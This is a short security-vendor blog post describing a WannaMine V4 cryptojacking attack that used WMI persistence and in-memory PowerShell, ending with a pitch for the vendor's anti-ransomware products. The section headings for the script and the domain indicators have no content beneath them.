Cryptojacking is a type of malware attack where threat actors use hijacked devices to illegally mine cryptocurrency. It is widely considered to be among the least invasive cyber security threats. That is because the goal of a cryptojacker is to remain hidden on the system for as long as possible, thus maximizing the value they extract from the target.
This belief is not only false but dangerous. Cryptojacking malware usually comes through unpatched servers or weak Remote Desktop Protocol (RDP) credentials, which can be exploited by much dreaded ransomware groups just as easily as they are used by cryptocurrency criminals.
WannaMine V4 , an active cryptojacker, has been recently detected and stopped by Minerva Labs. In the attack we detected, threat actors used WMI persistence in order to execute malicious PowerShell scripts that download code and execute it in-memory. In-memory techniques are frequently used by attackers in order to bypass traditional anti-virus products.
The decoded PowerShell script:
The events of the Crypto malware as depicted by Minerva’s platform:
Domain names & IPs:
If you think your organization may have been the victim of a cryptojacking attack, or want to learn more about Minerva Labs' anti-ransomware protection solutions, contact us.